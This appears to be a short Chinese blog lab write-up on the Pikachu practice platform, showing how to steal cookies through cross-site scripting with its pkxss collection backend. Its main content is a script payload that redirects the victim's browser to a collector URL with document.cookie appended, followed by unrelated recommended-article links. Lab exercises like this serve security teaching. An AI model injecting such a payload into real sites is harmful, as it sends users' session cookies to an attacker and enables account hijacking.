Pikichu-xss实验案例-通过xss获取cookie

原理图:

pikachu提供了一个pkxss后台;

该后台可以把获得的cookie信息显示出来;

查看后端代码cookie.php:就是获取cookie信息,保存起来,然后重定向跳转到目标页面;修改最后从定向的ip,改为自己测试用的IP地址;

对此,构造攻击payload, 获取到cookie ,然后从定向跳转到pkxss后台,pkxss后台把数据保存后,重新重定向回到被攻击的页面。

<script>document.location='http://192.168.3.224:8082/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
//192.168.3.224  代表pkxss 的后台   document.cookie表示获取被攻击平台的cookie
//拿到cookie后,重定向到pkxss后台把数据保存起来

得到攻击信息。

相关推荐
德迅云安全-小钱44 分钟前
跨站脚本攻击(XSS)原理及防护方案
前端·网络·xss
ss27344 分钟前
【2025小年源码免费送】
前端·后端
Amy_cx1 小时前
npm install安装缓慢或卡住不动
前端·npm·node.js
gyeolhada1 小时前
计算机组成原理(计算机系统3)--实验八:处理器结构拓展实验
java·前端·数据库·嵌入式硬件
小彭努力中1 小时前
16.在Vue3中使用Echarts实现词云图
前端·javascript·vue.js·echarts
flying robot1 小时前
React的响应式
前端·javascript·react.js
禁默1 小时前
深入探讨Web应用开发:从前端到后端的全栈实践
前端
来一碗刘肉面1 小时前
Vue - ref( ) 和 reactive( ) 响应式数据的使用
前端·javascript·vue.js
guhy fighting2 小时前
原生toFixed的bug
前端·javascript·bug
上官熊猫3 小时前
nuxt3项目打包部署到服务器后配置端口号和开启https
前端·vue3·nuxt3